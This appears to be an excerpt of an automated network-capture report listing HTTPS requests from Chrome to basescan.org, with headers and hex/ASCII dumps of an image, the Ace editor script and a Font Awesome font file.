                                                                                                                                                                                                                                              ETag: "0f8e5649facd81:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 10 Aug 2022 09:56:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 203469
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iu%2Bxz0oa69fau0F8fSnrzKEaAsVAC9FzhCGHoWlcV%2BSgENZ8mtI0Mj7N1ZmH2UUPpG%2BaAgfW3r49m1DiQWNdFMISuB758%2ByWmxo4DOZaAPU9FVA%2F4sfcI423%2FCqnMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2eacdba43df-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC514INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 03 00 00 00 ba 57 ed 3f 00 00 00 d5 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 0b 0b 00 00 00 00 00 00 00 00 00 e3 e3 e3 2e 2e 2e f7 f7 f7 ff ff ff fc fc fc 2d 2d 2d a4 a4 a6 43 42 44 3c 3b 3c 21 21 21 fa fa fa 94 94 96 60 60 60 5c 5c 5c 4b 4b 4b f3 f3 f3 de de de da da db af ae b0 69 69 6a 53 53 53 25 25 26 1c 1c 1c e9 e9 e9 e7 e7 e7 df df e0 cc cc cc bc bc be ba ba bb b2 b2 b3 a1 a1 a2 88 88 88 84 83 87 6d 6d 6e 66 66 66 5d 5d 5d 29 29 29 13 13 14 ed ed ed d2 d2 d3 cf cf cf cc cc ce c6 c6 c6 c1 c1 c3 bf bf c1 b6 b5 b7 a8 a8 aa 9c 9c 9e 99 98 9c 8f 8f 8f 8a 89 8b 7e 7e 80 79 79 79 5b 5b 5b 35 35 35 35 34 35 06 06 06 a5
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRW?PLTE...---CBD<;<!!!```\\\KKKiijSSS%%&mmnfff]]])))~~yyy[[[555545
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC53INData Raw: 00 36 56 98 3b f8 4d 0c 2e a9 4d eb 06 d1 38 c4 b5 21 9f 5f 5d 9f 3f 4b e6 b5 ff cf a1 f7 e7 f8 01 0b b5 19 d1 e9 61 9c c5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                              Data Ascii: 6V;M.M8!_]?KaIENDB`


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              131192.168.2.549880104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC350OUTGET /jss/ace/ace.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=354531
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 635196
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQtBHiCEC1B7p0xV%2Fkd38x0HdRoR8WkEJ1FhdlYyfdNqAtWPo7dbL8z9EkQ7mrAj7e5Ue6kPWjkrdDL%2FmmB1IGvNLwE3yjTGx4zjt5SOLs08CHAfRI7Pm2RwbVh9Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2eb2bcc7ca5-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC512INData Raw: 37 63 34 30 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 76 61 72 20 69 3d 65 3b 6e 26 26 28 65 5b 6e 5d 7c 7c 28 65 5b 6e 5d 3d 7b 7d 29 2c 69 3d 65 5b 6e 5d 29 3b 69 66 28 21 69 2e 64 65 66 69 6e 65 7c 7c 21 69 2e 64 65 66 69 6e 65 2e 70 61 63 6b 61 67 65 64 29 74 2e 6f 72 69 67 69 6e 61 6c 3d 69 2e 64 65 66 69 6e 65 2c 69 2e 64 65 66 69 6e 65 3d 74 2c 69 2e 64 65 66 69 6e 65 2e 70 61 63 6b 61 67 65 64 3d 21 30 3b 69 66 28 21 69 2e 72 65 71 75 69 72 65 7c 7c 21 69 2e 72 65 71 75 69 72 65 2e 70 61 63 6b 61 67 65 64 29 72 2e 6f 72 69 67 69 6e 61 6c 3d 69 2e 72 65 71 75 69 72 65 2c 69 2e 72 65 71 75 69 72 65 3d 72 2c 69 2e 72 65 71 75 69 72 65 2e 70 61 63 6b 61 67 65 64 3d 21 30 7d 76 61 72 20 41 43 45 5f 4e 41 4d 45
                                                                                                                                                                                                                                              Data Ascii: 7c40(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAME
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 62 65 63 61 75 73 65 20 64 65 66 69 6e 65 20 77 61 73 6e 27 74 20 61 20 73 74 72 69 6e 67 2e 22 29 2c 63 6f 6e 73 6f 6c 65 2e 74 72 61 63 65 28 29 29 3b 72 65 74 75 72 6e 7d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3d 3d 32 26 26 28 72 3d 6e 29 2c 74 2e 6d 6f 64 75 6c 65 73 5b 65 5d 7c 7c 28 74 2e 70 61 79 6c 6f 61 64 73 5b 65 5d 3d 72 2c 74 2e 6d 6f 64 75 6c 65 73 5b 65 5d 3d 6e 75 6c 6c 29 7d 3b 74 2e 6d 6f 64 75 6c 65 73 3d 7b 7d 2c 74 2e 70 61 79 6c 6f 61 64 73 3d 7b 7d 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 29 7b 76 61 72 20 69 3d 73 28 65 2c 74 29 3b 69 66 28 69 21 3d 75 6e 64 65 66 69 6e 65 64 29 72 65 74 75 72 6e 20 6e 26 26 6e 28 29 2c 69 7d 65 6c
                                                                                                                                                                                                                                              Data Ascii: because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)return n&&n(),i}el
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 2c 6e 29 3b 66 6f 72 28 76 61 72 20 72 3d 6e 7c 7c 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 69 66 28 65 5b 72 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 72 3b 72 65 74 75 72 6e 2d 31 7d 76 61 72 20 72 3d 7b 65 78 65 63 3a 52 65 67 45 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 65 78 65 63 2c 74 65 73 74 3a 52 65 67 45 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 74 65 73 74 2c 6d 61 74 63 68 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 2c 72 65 70 6c 61 63 65 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 2c 73 70 6c 69 74 3a 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 74 7d 2c 69 3d 72 2e 65 78 65 63 2e 63 61 6c 6c 28 2f 28 29 3f 3f 2f 2c 22 22 29 5b 31 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                                                                              Data Ascii: ,n);for(var r=n||0;r<e.length;r++)if(e[r]===t)return r;return-1}var r={exec:RegExp.prototype.exec,test:RegExp.prototype.test,match:String.prototype.match,replace:String.prototype.replace,split:String.prototype.split},i=r.exec.call(/()??/,"")[1]===undefine
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 7c 74 3d 3d 3d 22 73 74 72 69 6e 67 22 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3b 69 66 28 42 28 65 29 29 72 65 74 75 72 6e 20 65 3b 6e 3d 65 2e 76 61 6c 75 65 4f 66 3b 69 66 28 74 79 70 65 6f 66 20 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 3d 6e 2e 63 61 6c 6c 28 65 29 3b 69 66 28 42 28 74 29 29 72 65 74 75 72 6e 20 74 7d 72 3d 65 2e 74 6f 53 74 72 69 6e 67 3b 69 66 28 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 3d 72 2e 63 61 6c 6c 28 65 29 3b 69 66 28 42 28 74 29 29 72 65 74 75 72 6e 20 74 7d 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 7d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 7c 7c 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69
                                                                                                                                                                                                                                              Data Ascii: |t==="string"}function j(e){var t,n,r;if(B(e))return e;n=e.valueOf;if(typeof n=="function"){t=n.call(e);if(B(t))return t}r=e.toString;if(typeof r=="function"){t=r.call(e);if(B(t))return t}throw new TypeError}Function.prototype.bind||(Function.prototype.bi
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 68 69 73 2c 69 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 4d 61 74 68 2e 6d 69 6e 28 74 2c 6e 2d 65 29 2c 61 3d 65 2b 6f 2c 66 3d 61 2b 73 2d 6f 2c 6c 3d 6e 2d 61 2c 63 3d 6e 2d 6f 3b 69 66 28 66 3c 61 29 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 6c 3b 2b 2b 68 29 74 68 69 73 5b 66 2b 68 5d 3d 74 68 69 73 5b 61 2b 68 5d 3b 65 6c 73 65 20 69 66 28 66 3e 61 29 66 6f 72 28 68 3d 6c 3b 68 2d 2d 3b 29 74 68 69 73 5b 66 2b 68 5d 3d 74 68 69 73 5b 61 2b 68 5d 3b 69 66 28 73 26 26 65 3d 3d 3d 63 29 74 68 69 73 2e 6c 65 6e 67 74 68 3d 63 2c 74 68 69 73 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 68 69 73 2c 69 29 3b 65 6c 73 65 7b 74 68 69 73 2e 6c 65 6e 67 74 68 3d 63 2b 73 3b 66 6f 72 28 68 3d 30 3b 68 3c 73 3b 2b 2b 68 29 74 68 69 73 5b 65 2b 68 5d 3d 69 5b 68 5d 7d
                                                                                                                                                                                                                                              Data Ascii: this,i);else{var o=Math.min(t,n-e),a=e+o,f=a+s-o,l=n-a,c=n-o;if(f<a)for(var h=0;h<l;++h)this[f+h]=this[a+h];else if(f>a)for(h=l;h--;)this[f+h]=this[a+h];if(s&&e===c)this.length=c,this.push.apply(this,i);else{this.length=c+s;for(h=0;h<s;++h)this[e+h]=i[h]}
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 20 72 26 26 28 6f 3d 72 5b 66 5d 2c 74 2e 63 61 6c 6c 28 75 2c 6f 2c 66 2c 6e 29 26 26 73 2e 70 75 73 68 28 6f 29 29 3b 72 65 74 75 72 6e 20 73 7d 29 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 72 79 7c 7c 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 46 28 74 68 69 73 29 2c 72 3d 67 26 26 61 28 74 68 69 73 29 3d 3d 22 5b 6f 62 6a 65 63 74 20 53 74 72 69 6e 67 5d 22 3f 74 68 69 73 2e 73 70 6c 69 74 28 22 22 29 3a 6e 2c 69 3d 72 2e 6c 65 6e 67 74 68 3e 3e 3e 30 2c 73 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 69 66 28 61 28 74 29 21 3d 22 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 2b 22 20
                                                                                                                                                                                                                                              Data Ascii: r&&(o=r[f],t.call(u,o,f,n)&&s.push(o));return s}),Array.prototype.every||(Array.prototype.every=function(t){var n=F(this),r=g&&a(this)=="[object String]"?this.split(""):n,i=r.length>>>0,s=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+"
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 72 28 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 21 69 26 26 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3d 3d 31 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 72 65 64 75 63 65 52 69 67 68 74 20 6f 66 20 65 6d 70 74 79 20 61 72 72 61 79 20 77 69 74 68 20 6e 6f 20 69 6e 69 74 69 61 6c 20 76 61 6c 75 65 22 29 3b 76 61 72 20 73 2c 6f 3d 69 2d 31 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 32 29 73 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 65 6c 73 65 20 64 6f 7b 69 66 28 6f 20 69 6e 20 72 29 7b 73 3d 72 5b 6f 2d 2d 5d 3b 62 72 65 61 6b 7d 69 66 28 2d 2d 6f 3c 30 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 72 65 64 75 63 65 52 69 67 68 74 20 6f 66 20 65
                                                                                                                                                                                                                                              Data Ascii: r(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduceRight of empty array with no initial value");var s,o=i-1;if(arguments.length>=2)s=arguments[1];else do{if(o in r){s=r[o--];break}if(--o<0)throw new TypeError("reduceRight of e
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 69 2c 73 3b 72 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 69 66 28 64 29 7b 76 61 72 20 75 3d 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6f 3b 76 61 72 20 69 3d 68 28 74 2c 6e 29 2c 73 3d 70 28 74 2c 6e 29 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 75 3b 69 66 28 69 7c 7c 73 29 72 65 74 75 72 6e 20 69 26 26 28 72 2e 67 65 74 3d 69 29 2c 73 26 26 28 72 2e 73 65 74 3d 73 29 2c 72 7d 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 5b 6e 5d 2c 72 7d 7d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 7c 7c 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62
                                                                                                                                                                                                                                              Data Ascii: i,s;r={enumerable:!0,configurable:!0};if(d){var u=t.__proto__;t.__proto__=o;var i=h(t,n),s=p(t,n);t.__proto__=u;if(i||s)return i&&(r.get=i),s&&(r.set=s),r}return r.value=t[n],r}}Object.getOwnPropertyNames||(Object.getOwnPropertyNames=function(t){return Ob
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 61 74 63 68 28 69 29 7b 7d 69 66 28 66 28 72 2c 22 76 61 6c 75 65 22 29 29 69 66 28 64 26 26 28 68 28 74 2c 6e 29 7c 7c 70 28 74 2c 6e 29 29 29 7b 76 61 72 20 73 3d 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6f 2c 64 65 6c 65 74 65 20 74 5b 6e 5d 2c 74 5b 6e 5d 3d 72 2e 76 61 6c 75 65 2c 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 7d 65 6c 73 65 20 74 5b 6e 5d 3d 72 2e 76 61 6c 75 65 3b 65 6c 73 65 7b 69 66 28 21 64 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 43 29 3b 66 28 72 2c 22 67 65 74 22 29 26 26 6c 28 74 2c 6e 2c 72 2e 67 65 74 29 2c 66 28 72 2c 22 73 65 74 22 29 26 26 63 28 74 2c 6e 2c 72 2e 73 65 74 29 7d 72 65 74 75 72 6e 20 74 7d 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73
                                                                                                                                                                                                                                              Data Ascii: atch(i){}if(f(r,"value"))if(d&&(h(t,n)||p(t,n))){var s=t.__proto__;t.__proto__=o,delete t[n],t[n]=r.value,t.__proto__=s}else t[n]=r.value;else{if(!d)throw new TypeError(C);f(r,"get")&&l(t,n,r.get),f(r,"set")&&c(t,n,r.set)}return t}}Object.defineProperties
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 75 73 68 28 69 29 7d 72 65 74 75 72 6e 20 49 7d 7d 44 61 74 65 2e 6e 6f 77 7c 7c 28 44 61 74 65 2e 6e 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 29 3b 76 61 72 20 5f 3d 22 09 5c 6e 0b 5c 66 5c 72 20 5c 75 30 30 61 30 5c 75 31 36 38 30 5c 75 31 38 30 65 5c 75 32 30 30 30 5c 75 32 30 30 31 5c 75 32 30 30 32 5c 75 32 30 30 33 5c 75 32 30 30 34 5c 75 32 30 30 35 5c 75 32 30 30 36 5c 75 32 30 30 37 5c 75 32 30 30 38 5c 75 32 30 30 39 5c 75 32 30 30 61 5c 75 32 30 32 66 5c 75 32 30 35 66 5c 75 33 30 30 30 5c 75 32 30 32 38 5c 75 32 30 32 39 5c 75 66 65 66 66 22 3b 69 66 28 21 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 7c 7c 5f 2e 74 72 69 6d 28 29 29 7b 5f 3d 22
                                                                                                                                                                                                                                              Data Ascii: ush(i)}return I}}Date.now||(Date.now=function(){return(new Date).getTime()});var _="\n\f\r \u00a0\u1680\u180e\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u202f\u205f\u3000\u2028\u2029\ufeff";if(!String.prototype.trim||_.trim()){_="


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              132192.168.2.549881104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC706OUTGET /assets/vendor/font-awesome/webfonts/fa-brands-400.ttf HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC939INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 209876
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEJnLp2bHHimBipOI5dTLFaqQMvAKIidLsMEBUmW1i6wtnkLDoZKepS4zd3uZyno80o4IFDPYdWNmXIak68q4xjPRoc%2FSRtdzR640Y7dAn%2FcbxNgBCilgu4LE2HSgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Set-Cookie: __cflb=0H28vtoAdHDLg8sTeQQMiRCFaG8m9Kq7nNXm9fj4d1W; SameSite=None; Secure; path=/; expires=Sun, 29-Sep-24 00:16:09 GMT; HttpOnly
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2eb4d034370-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC430INData Raw: 00 01 00 00 00 0a 00 80 00 03 00 20 4f 53 2f 32 5f 7c 5e 70 00 00 01 28 00 00 00 60 63 6d 61 70 86 bc 4b 42 00 00 0a 18 00 00 12 c2 67 6c 79 66 fc c1 50 7f 00 00 25 70 00 02 f2 18 68 65 61 64 27 c1 19 9a 00 00 00 ac 00 00 00 36 68 68 65 61 04 52 04 4a 00 00 00 e4 00 00 00 24 68 6d 74 78 fe 45 08 6e 00 00 01 88 00 00 08 90 6c 6f 63 61 02 b6 4f 10 00 00 1c dc 00 00 08 94 6d 61 78 70 02 4d 04 51 00 00 01 08 00 00 00 20 6e 61 6d 65 97 5e 0f 6a 00 03 17 88 00 00 04 1d 70 6f 73 74 d9 1b ff 66 00 03 1b a8 00 00 18 2c 00 01 00 00 03 05 03 00 9f ef ef c6 5f 0f 3c f5 00 0b 02 00 00 00 00 00 e1 8d 6b 0d 00 00 00 00 e1 8d 6b 0d ff f3 ff b6 02 90 01 cc 00 00 00 08 00 02 00 01 00 00 00 00 00 01 00 00 01 cc ff b6 00 00 02 80 ff f3 ff ef 02 90 00 01 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: OS/2_|^p(`cmapKBglyfP%phead'6hheaRJ$hmtxEnlocaOmaxpMQ name^jpostf,_<kk
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 00 1e 01 80 ff fe 01 c0 00 10 00 c0 00 10 01 40 00 00 00 c0 00 20 01 40 ff fe 01 40 00 00 01 00 ff fe 01 40 ff fb 01 40 ff fe 01 80 ff fc 01 40 ff fe 01 40 00 00 01 40 00 00 01 40 00 00 01 40 00 00 00 c0 00 17 00 c0 00 07 01 80 00 00 01 c0 00 10 01 80 ff fe 01 40 00 10 02 00 00 00 01 80 ff fe 01 40 00 00 01 80 ff f9 01 80 00 00 01 40 00 00 01 40 00 00 01 c0 00 00 01 80 00 00 01 40 00 00 01 40 00 00 01 40 00 00 01 40 00 20 01 c0 00 00 01 80 00 00 01 c0 00 00 01 40 00 00 01 c0 00 00 01 40 00 00 01 40 ff fc 01 80 00 00 01 80 00 00 01 80 ff fe 02 40 ff fe 01 80 ff ff 01 80 ff fe 01 80 ff fb 00 c0 00 00 01 40 ff fe 00 c0 00 20 00 c0 00 20 02 00 00 0c 02 40 00 20 01 c0 00 02 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 00 00 1f 01 c0 00 05 02 40 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @ @@@@@@@@@@@@@@@@@ @@@@@ @ @
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 00 02 00 00 20 02 00 00 19 01 c0 00 00 01 80 ff fa 02 00 00 18 01 f0 ff ff 01 c0 00 00 01 c0 00 00 02 00 00 00 01 c0 00 00 01 80 00 00 02 00 00 07 02 00 00 00 02 00 00 00 01 c0 00 02 01 40 00 00 02 20 00 00 01 c0 00 00 01 c0 00 00 01 f0 00 00 01 f0 00 00 01 f0 00 00 01 c0 00 01 02 40 00 00 02 80 00 00 01 90 ff ff 01 f0 00 00 02 40 00 07 02 00 00 15 01 c0 00 13 01 f0 00 00 02 80 00 00 02 40 ff fb 01 b0 ff fe 01 c0 00 00 01 c0 00 00 01 f0 00 00 01 c0 00 00 01 f0 00 00 02 40 00 00 01 f0 00 00 01 c0 00 00 01 cc 00 00 01 f0 00 00 01 c0 00 00 01 c0 00 05 01 b8 ff fd 01 c0 00 00 02 40 ff ff 02 00 00 13 02 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 80 00 08 01 e2 00 00 01 c0 ff ff 02 00 00 0c 01 c0 00 00 02 80 ff ff 01 c0 00 00 01 c0 00 00 02 00 00 08 02 00
                                                                                                                                                                                                                                              Data Ascii: @ @@@@@
